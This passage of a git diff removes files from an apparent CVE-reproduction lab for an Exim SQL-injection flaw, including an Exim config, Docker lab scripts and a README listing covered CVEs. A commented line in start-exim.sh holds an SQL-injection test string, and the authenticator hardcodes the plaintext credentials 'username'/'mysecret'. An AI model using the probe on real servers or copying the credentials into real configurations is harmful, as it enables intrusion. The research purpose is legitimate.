# verification is omitted, and submission mode is set. And again, we do this - # check before any black list tests. - - accept authenticated = * - control = submission - control = dkim_disable_verify - - # Insist that any other recipient address that we accept is either in one of - # our local domains, or is in a domain for which we explicitly allow - # relaying. Any other domain is rejected as being unacceptable for relaying. - - require message = relay not permitted - domains = +local_domains : +relay_to_domains - - # We also require all accepted addresses to be verifiable. This check will - # do local part verification for local domains, but only check the domain - # for remote domains. The only way to check local parts for the remote - # relay domains is to use a callout (add /callout), but please read the - # documentation about callouts before doing this. - - require verify = recipient - - ############################################################################# - # There are no default checks on DNS black lists because the domains that - # contain these lists are changing all the time. However, here are two - # examples of how you can get Exim to perform a DNS black list lookup at this - # point. The first one denies, whereas the second just warns. - # - # deny dnslists = black.list.example - # message = rejected because $sender_host_address is in a black list at $dnslist_domain\n$dnslist_text - # - # warn dnslists = black.list.example - # add_header = X-Warning: $sender_host_address is in a black list at $dnslist_domain - # log_message = found in $dnslist_domain - ############################################################################# - - ############################################################################# - # This check is commented out because it is recognized that not every - # sysadmin will want to do it. If you enable it, the check performs - # Client SMTP Authorization (csa) checks on the sending host. These checks - # do DNS lookups for SRV records. The CSA proposal is currently (May 2005) - # an Internet draft. You can, of course, add additional conditions to this - # ACL statement to restrict the CSA checks to certain hosts only. - # - # require verify = csa - ############################################################################# - - ############################################################################# - # If doing per-user content filtering then recipients with filters different - # to the first recipient must be deferred unless the sender talks PRDR. - # - # defer !condition = $prdr_requested - # condition = ${if > {0}{$recipients_count}} - # condition = ${if !eq {$acl_m_content_filter} \ - # {${lookup PER_RCPT_CONTENT_FILTER}}} - # warn !condition = $prdr_requested - # condition = ${if > {0}{$recipients_count}} - # set acl_m_content_filter = ${lookup PER_RCPT_CONTENT_FILTER} - ############################################################################# - - # At this point, the address has passed all the checks that have been - # configured, so we accept it unconditionally. - - accept - - -# This ACL is used once per recipient, for multi-recipient messages, if -# we advertised PRDR. It can be used to perform receipient-dependent -# header- and body- based filtering and rejections. -# We set a variable to record that PRDR was active used, so that checking -# in the data ACL can be skipped. - -.ifdef _HAVE_PRDR -acl_check_prdr: - warn set acl_m_did_prdr = y - - ############################################################################# - # do lookup on filtering, with $local_part@$domain, deny on filter match - # - # deny set acl_m_content_filter = ${lookup PER_RCPT_CONTENT_FILTER} - # condition = ... - ############################################################################# - - accept -.endif - -# This ACL is used after the contents of a message have been received. This -# is the ACL in which you can test a message's headers or body, and in -# particular, this is where you can invoke external virus or spam scanners. -# Some suggested ways of configuring these tests are shown below, commented -# out. Without any tests, this ACL accepts all messages. If you want to use -# such tests, you must ensure that Exim is compiled with the content-scanning -# extension (WITH_CONTENT_SCAN=yes in Local/Makefile). - -acl_check_data: - - # Deny if the message contains an overlong line. Per the standards - # we should never receive one such via SMTP. - # - deny condition = ${if > {$max_received_linelength}{998}} - message = maximum allowed line length is 998 octets, \ - got $max_received_linelength - - # Deny if the headers contain badly-formed addresses. - # - deny !verify = header_syntax - message = header syntax - log_message = header syntax ($acl_verify_message) - - # Deny if the message contains a virus. Before enabling this check, you - # must install a virus scanner and set the av_scanner option above. - # - # deny malware = * - # message = This message contains a virus ($malware_name). - - # Add headers to a message if it is judged to be spam. Before enabling this, - # you must install SpamAssassin. You may also need to set the spamd_address - # option above. - # - # warn spam = nobody - # add_header = X-Spam_score: $spam_score\n\ - # X-Spam_score_int: $spam_score_int\n\ - # X-Spam_bar: $spam_bar\n\ - # X-Spam_report: $spam_report - - ############################################################################# - # No more tests if PRDR was actively used. - # accept condition = ${if def:acl_m_did_prdr} - # - # To get here, all message recipients must have identical per-user - # content filtering (enforced by RCPT ACL). Do lookup for filter - # and deny on match. - # - # deny set acl_m_content_filter = ${lookup PER_RCPT_CONTENT_FILTER} - # condition = ... - ############################################################################# - - - # Accept the message. - - accept - - - -###################################################################### -# ROUTERS CONFIGURATION # -# Specifies how addresses are handled # -###################################################################### -# THE ORDER IN WHICH THE ROUTERS ARE DEFINED IS IMPORTANT! # -# An address is passed to each router in turn until it is accepted. # -###################################################################### - -begin routers - -# This router routes to remote hosts over SMTP by explicit IP address, -# when an email address is given in "domain literal" form, for example, -# . The RFCs require this facility. However, it is -# little-known these days, and has been exploited by evil people seeking -# to abuse SMTP relays. Consequently it is commented out in the default -# configuration. If you uncomment this router, you also need to uncomment -# allow_domain_literals above, so that Exim can recognize the syntax of -# domain literal addresses. - -# domain_literal: -# driver = ipliteral -# domains = ! +local_domains -# transport = remote_smtp - - -# This router can be used when you want to send all mail to a -# server which handles DNS lookups for you; an ISP will typically run such -# a server for their customers. The hostname in route_data comes from the -# macro defined at the top of the file. If not defined, then we'll use the -# dnslookup router below instead. -# Beware that the hostname is specified again in the Transport. - -.ifdef ROUTER_SMARTHOST - -smarthost: - driver = manualroute - domains = ! +local_domains - transport = smarthost_smtp - route_data = ROUTER_SMARTHOST - ignore_target_hosts = <; 0.0.0.0 ; 127.0.0.0/8 ; ::1 - no_more - -.else - -# This router routes addresses that are not in local domains by doing a DNS -# lookup on the domain name. The exclamation mark that appears in "domains = ! -# +local_domains" is a negating operator, that is, it can be read as "not". The -# recipient's domain must not be one of those defined by "domainlist -# local_domains" above for this router to be used. -# -# If the router is used, any domain that resolves to 0.0.0.0 or to a loopback -# interface address (127.0.0.0/8) is treated as if it had no DNS entry. Note -# that 0.0.0.0 is the same as 0.0.0.0/32, which is commonly treated as the -# local host inside the network stack. It is not 0.0.0.0/0, the default route. -# If the DNS lookup fails, no further routers are tried because of the no_more -# setting, and consequently the address is unrouteable. - -dnslookup: - driver = dnslookup - domains = ! +local_domains - transport = remote_smtp - ignore_target_hosts = 0.0.0.0 : 127.0.0.0/8 -# if ipv6-enabled then instead use: -# ignore_target_hosts = <; 0.0.0.0 ; 127.0.0.0/8 ; ::1 - no_more - -# This closes the ROUTER_SMARTHOST ifdef around the choice of routing for -# off-site mail. -.endif - - -# The remaining routers handle addresses in the local domain(s), that is those -# domains that are defined by "domainlist local_domains" above. - - -# This router handles aliasing using a linearly searched alias file with the -# name /etc/aliases. When this configuration is installed automatically, -# the name gets inserted into this file from whatever is set in Exim's -# build-time configuration. The default path is the traditional /etc/aliases. -# If you install this configuration by hand, you need to specify the correct -# path in the "data" setting below. -# -##### NB You must ensure that the alias file exists. It used to be the case -##### NB that every Unix had that file, because it was the Sendmail default. -##### NB These days, there are systems that don't have it. Your aliases -##### NB file should at least contain an alias for "postmaster". -# -# If any of your aliases expand to pipes or files, you will need to set -# up a user and a group for these deliveries to run under. You can do -# this by uncommenting the "user" option below (changing the user name -# as appropriate) and adding a "group" option if necessary. Alternatively, you -# can specify "user" on the transports that are used. Note that the transports -# listed below are the same as are used for .forward files; you might want -# to set up different ones for pipe and file deliveries from aliases. - -system_aliases: - driver = redirect - allow_fail - allow_defer - data = ${lookup{$local_part}lsearch{/etc/aliases}} -# user = exim - file_transport = address_file - pipe_transport = address_pipe - - -# This router handles forwarding using traditional .forward files in users' -# home directories. If you want it also to allow mail filtering when a forward -# file starts with the string "# Exim filter" or "# Sieve filter", uncomment -# the "allow_filter" option. - -# The no_verify setting means that this router is skipped when Exim is -# verifying addresses. Similarly, no_expn means that this router is skipped if -# Exim is processing an EXPN command. - -# If you want this router to treat local parts with suffixes introduced by "-" -# or "+" characters as if the suffixes did not exist, uncomment the two local_ -# part_suffix options. Then, for example, xxxx-foo@your.domain will be treated -# in the same way as xxxx@your.domain by this router. Because this router is -# not used for verification, if you choose to uncomment those options, then you -# will *need* to make the same change to the localuser router. (There are -# other approaches, if this is undesirable, but they add complexity). - -# The check_ancestor option means that if the forward file generates an -# address that is an ancestor of the current one, the current one gets -# passed on instead. This covers the case where A is aliased to B and B -# has a .forward file pointing to A. - -# The three transports specified at the end are those that are used when -# forwarding generates a direct delivery to a file, or to a pipe, or sets -# up an auto-reply, respectively. - -userforward: - driver = redirect - check_local_user -# local_part_suffix = +* : -* -# local_part_suffix_optional - file = $home/.forward -# allow_filter - no_verify - no_expn - check_ancestor - file_transport = address_file - pipe_transport = address_pipe - reply_transport = address_reply - - -# This router matches local user mailboxes. If the router fails, the error -# message is "Unknown user". - -# If you want this router to treat local parts with suffixes introduced by "-" -# or "+" characters as if the suffixes did not exist, uncomment the two local_ -# part_suffix options. Then, for example, xxxx-foo@your.domain will be treated -# in the same way as xxxx@your.domain by this router. - -localuser: - driver = accept - check_local_user -# local_part_suffix = +* : -* -# local_part_suffix_optional - transport = local_delivery - cannot_route_message = Unknown user - - - -###################################################################### -# TRANSPORTS CONFIGURATION # -###################################################################### -# ORDER DOES NOT MATTER # -# Only one appropriate transport is called for each delivery. # -###################################################################### - -# A transport is used only when referenced from a router that successfully -# handles an address. - -begin transports - - -# This transport is used for delivering messages over SMTP connections. - -remote_smtp: - driver = smtp -.ifdef _HAVE_TLS_RESUME - tls_resumption_hosts = * -.endif - - -# This transport is used for delivering messages to a smarthost, if the -# smarthost router is enabled. This starts from the same basis as -# "remote_smtp" but then turns on various security options, because -# we assume that if you're told "use smarthost.example.org as the smarthost" -# then there will be TLS available, with a verifiable certificate for that -# hostname, using decent TLS. - -smarthost_smtp: - driver = smtp - multi_domain - # -.ifdef _HAVE_TLS - # Comment out any of these which you have to, then file a Support - # request with your smarthost provider to get things fixed: - hosts_require_tls = * - tls_verify_hosts = * - # As long as tls_verify_hosts is enabled this will have no effect, - # but if you have to comment it out then this will at least log whether - # you succeed or not: - tls_try_verify_hosts = * - # - # The SNI name should match the name which we'll expect to verify; - # many mail systems don't use SNI and this doesn't matter, but if it does, - # we need to send a name which the remote site will recognize. - # This _should_ be the name which the smarthost operators specified as - # the hostname for sending your mail to. - tls_sni = ROUTER_SMARTHOST - # -.ifdef _HAVE_OPENSSL - tls_require_ciphers = HIGH:!aNULL:@STRENGTH -.endif -.ifdef _HAVE_GNUTLS - tls_require_ciphers = SECURE192:-VERS-SSL3.0:-VERS-TLS1.0:-VERS-TLS1.1 -.endif -.ifdef _HAVE_TLS_RESUME - tls_resumption_hosts = * -.endif -.endif - - -# This transport is used for local delivery to user mailboxes in traditional -# BSD mailbox format. By default it will be run under the uid and gid of the -# local user, and requires the sticky bit to be set on the /var/mail directory. -# Some systems use the alternative approach of running mail deliveries under a -# particular group instead of using the sticky bit. The commented options below -# show how this can be done. - -local_delivery: - driver = appendfile - file = /var/mail/$local_part_data - delivery_date_add - envelope_to_add - return_path_add -# group = mail -# mode = 0660 - - -# This transport is used for handling pipe deliveries generated by alias or -# .forward files. If the pipe generates any standard output, it is returned -# to the sender of the message as a delivery error. Set return_fail_output -# instead of return_output if you want this to happen only when the pipe fails -# to complete normally. You can set different transports for aliases and -# forwards if you want to - see the references to address_pipe in the routers -# section above. - -address_pipe: - driver = pipe - return_output - - -# This transport is used for handling deliveries directly to files that are -# generated by aliasing or forwarding. - -address_file: - driver = appendfile - delivery_date_add - envelope_to_add - return_path_add - - -# This transport is used for handling autoreplies generated by the filtering -# option of the userforward router. - -address_reply: - driver = autoreply - - - -###################################################################### -# RETRY CONFIGURATION # -###################################################################### - -begin retry - -# This single retry rule applies to all domains and all errors. It specifies -# retries every 15 minutes for 2 hours, then increasing retry intervals, -# starting at 1 hour and increasing each time by a factor of 1.5, up to 16 -# hours, then retries every 6 hours until 4 days have passed since the first -# failed delivery. - -# WARNING: If you do not have any retry rules at all (this section of the -# configuration is non-existent or empty), Exim will not do any retries of -# messages that fail to get delivered at the first attempt. The effect will -# be to treat temporary errors as permanent. Therefore, DO NOT remove this -# retry rule unless you really don't want any retries. - -# Address or Domain Error Retries -# ----------------- ----- ------- - -* * F,2h,15m; G,16h,1h,1.5; F,4d,6h - - - -###################################################################### -# REWRITE CONFIGURATION # -###################################################################### - -# There are no rewriting specifications in this default configuration file. - -begin rewrite - - - -###################################################################### -# AUTHENTICATION CONFIGURATION # -###################################################################### - -# The following authenticators support plaintext username/password -# authentication using the standard PLAIN mechanism and the traditional -# but non-standard LOGIN mechanism, with Exim acting as the server. -# PLAIN and LOGIN are enough to support most MUA software. -# -# These authenticators are not complete: you need to change the -# server_condition settings to specify how passwords are verified. -# They are set up to offer authentication to the client only if the -# connection is encrypted with TLS, so you also need to add support -# for TLS. See the global configuration options section at the start -# of this file for more about TLS. -# -# The default RCPT ACL checks for successful authentication, and will accept -# messages from authenticated users from anywhere on the Internet. - -begin authenticators - -# PLAIN authentication has no server prompts. The client sends its -# credentials in one lump, containing an authorization ID (which we do not -# use), an authentication ID, and a password. The latter two appear as -# $auth2 and $auth3 in the configuration and should be checked against a -# valid username and password. In a real configuration you would typically -# use $auth2 as a lookup key, and compare $auth3 against the result of the -# lookup, perhaps using the crypteq{}{} condition. - -PLAIN: -driver = plaintext -public_name = PLAIN -server_condition = “$if{{ and {{eq{$auth2}{username}}{eq{$auth3}{mysecret}}}}” -server_set_id = $auth2 - -# server_prompts = : -# server_condition = Authentication is not yet configured -# server_advertise_condition = ${if def:tls_in_cipher } -#PLAIN: -# driver = plaintext -# server_set_id = $auth2 -# server_prompts = : -# server_condition = Authentication is not yet configured -# server_advertise_condition = ${if def:tls_in_cipher } - -# LOGIN authentication has traditional prompts and responses. There is no -# authorization ID in this mechanism, so unlike PLAIN the username and -# password are $auth1 and $auth2. Apart from that you can use the same -# server_condition setting for both authenticators. - -#LOGIN: -# driver = plaintext -# server_set_id = $auth1 -# server_prompts = <| Username: | Password: -# server_condition = Authentication is not yet configured -# server_advertise_condition = ${if def:tls_in_cipher } - - -###################################################################### -# CONFIGURATION FOR local_scan() # -###################################################################### - -# If you have built Exim to include a local_scan() function that contains -# tables for private options, you can define those options here. Remember to -# uncomment the "begin" line. It is commented by default because it provokes -# an error with Exim binaries that are not built with LOCAL_SCAN_HAS_OPTIONS -# set in the Local/Makefile. - -# begin local_scan - - -# End of Exim configuration file diff --git a/CVE-2025-26794/files/connect_docker.sh b/CVE-2025-26794/files/connect_docker.sh deleted file mode 100644 index 37f7c8f..0000000 --- a/CVE-2025-26794/files/connect_docker.sh +++ /dev/null @@ -1 +0,0 @@ -sudo docker exec -it exim bash diff --git a/CVE-2025-26794/files/docker.sh b/CVE-2025-26794/files/docker.sh deleted file mode 100644 index 5d5cfa3..0000000 --- a/CVE-2025-26794/files/docker.sh +++ /dev/null @@ -1,4 +0,0 @@ -sudo docker build -t exim . -sudo docker container rm -f exim -sudo docker run --name exim --cap-add SYS_PTRACE --security-opt seccomp=unconfined -d -p 25:25 -i -t exim -sudo docker exec -i -t exim /bin/bash diff --git a/CVE-2025-26794/files/start-exim.sh b/CVE-2025-26794/files/start-exim.sh deleted file mode 100644 index 3925f98..0000000 --- a/CVE-2025-26794/files/start-exim.sh +++ /dev/null @@ -1,3 +0,0 @@ -/usr/exim/bin/exim -bd -q30m -d -#gdb -p `ps aux | grep 'exim' | awk 'NR==1{print $2}'` -#/usr/exim/bin/exim -d -be '${lookup {test'\'' AND 1=2 \* } dbm {/var/spool/exim/db/misc} }' \ No newline at end of file diff --git a/README.md b/README.md deleted file mode 100644 index 2e16bea..0000000 --- a/README.md +++ /dev/null @@ -1,68 +0,0 @@ -# Reproduction of Recent CVEs - -This repository is based on recently discovered CVEs and focuses on how to exploit, patch, and investigate the root causes of these vulnerabilities. DefHawk is working on high-critical CVEs that have caused significant damage to services, aiming to explore the extent of the impact. - -Each section in this repository is dedicated to a specific vulnerability and contains all the information needed to set up a safe environment. Some sections also include instructions on exploiting the vulnerability in real-world scenarios. After thorough research, a detailed report will be attached to each section. - -For a list of CVEs covered, see the following document: -[Google Sheets List of CVEs](https://docs.google.com/spreadsheets/d/1M6E_NRWxdLzWCeyMM0Dgepo36WiLItvFS30I3dHeWO0/) - - - - -# CVE-XXXX-XXXX - - -| **Step** | **Details** | **Progress** | -|------------------------------------|----------------------------------------------------------------------------------------------------------------------|-------------------| -| **Set up a Safe Testing Env** | | :heavy_check_mark: | -| - Create a Virtual Lab | Use VirtualBox, VMware, or Docker to create an isolated environment. | :heavy_check_mark: -| - Choose a Suitable OS | Install an OS compatible with the CVEs (e.g., Linux, Windows, or a specific version of software). | According to the CVE :heavy_check_mark: -| - Install Necessary Tools | Include tools like Metasploit, Burp Suite, or specific debugging tools relevant to the CVEs. | :heavy_check_mark: -| **Select Recent CVEs to Reproduce**| | -| - Severity and Exploitability | Focus on CVEs with high CVSS scores and known exploitation in the wild. | :heavy_check_mark: -| - Availability of Public PoCs | Choose vulnerabilities with available PoCs for easier reproduction. | :heavy_check_mark: -| - Compatibility with My Env | Ensure the CVE is compatible with your virtual lab setup (OS and software versions). | ❎ -| **Download and Set up the PoCs** | | -| - Find the PoCs in Test Env | Search on GitHub or Exploit-DB for reliable PoCs related to selected CVEs. | :heavy_check_mark: -| - Verify PoC and Audit | Carefully read and test the PoC in a controlled environment; audit output to ensure it matches expected behavior. | :heavy_check_mark: -| **Simulate and Document Process** | | -| - Prepare Documentation | Document each setup step, including OS, software versions, and configurations. | ⏲️ -| - Execute the Exploit | Run the PoC and capture screenshots or logs to verify successful exploitation. | ⏲️ -| - Analyze the Results | Explain how the vulnerability was exploited and why it works, with screenshots or logs as evidence. | -| **Present the Findings** | | -| - Overview of the CVEs | Provide a brief summary, CVSS score, and affected software for each CVE. | -| - Reproduction Steps | Include clear instructions for setting up and reproducing each CVE in a controlled environment. | -| - Screenshots and Evidence | Add screenshots or logs showing successful exploitation. | -| - Mitigation | List any patches, configuration changes, or mitigations for each vulnerability. | -| **Additional Tips** | | -| - Security Practice and Approach | Follow safe security practices and take a controlled "hacker" approach to prevent risks. | - - - -## 📌 CVEs Included - -| CVE ID | Description | -|---------------------|------------| -| **CVE-2020-7660** | **`serialize-javascript` Remote Code Execution**: A vulnerability in `serialize-javascript` allows attackers to execute arbitrary code during the deserialization process. | -| **CVE-2024-31982** | **XWiki Remote Code Execution (RCE)**: An RCE vulnerability in XWiki enables attackers to execute arbitrary code remotely, compromising the affected system. | -| **CVE-2024-45519** | **Zimbra Remote Command Execution (RCE)**: A vulnerability in Zimbra allows remote attackers to execute arbitrary commands on the server, potentially leading to full system compromise. | -| **CVE-2024-46538** | **pfSense Cross-Site Scripting (XSS)**: A cross-site scripting vulnerability in pfSense v2.5.2 allows attackers to inject arbitrary web scripts or HTML via a crafted payload, potentially leading to unauthorized access or data leakage. | -| **CVE-2024-49113** | **Grafana Command Injection and Local File Inclusion**: An issue in Grafana's SQL Expressions feature allows attackers to execute arbitrary commands and include local files, potentially leading to remote code execution and unauthorized file access. | -| **CVE-2024-9264** | **Grafana Command Injection and Local File Inclusion**: Another critical vulnerability in Grafana's SQL Expressions feature enables command injection and local file inclusion, posing significant security risks. | -| **CVE-2025-0411** | **7-Zip Mark-of-the-Web Bypass**: A vulnerability in 7-Zip allows attackers to bypass the Mark-of-the-Web protection mechanism, potentially executing malicious code without user consent. | -| **CVE-2025-26794** | **Exim Remote SQL Injection**: A vulnerability in Exim versions prior to 4.98.1 allows remote attackers to perform SQL injection attacks, potentially compromising the mail server. | - -## 🚀 How to Use -1. Clone the repository: - ```bash - git clone https://github.com/defhawk-specter/defhawk-cve.git - ``` - -2. Navigate to the CVE folder of interest -. -3. Follow the instructions in the respective CVE directory. - -## Disclaimer - -This repository is strictly for educational and research purposes. Any misuse of this information is strictly prohibited. Use at your own risk!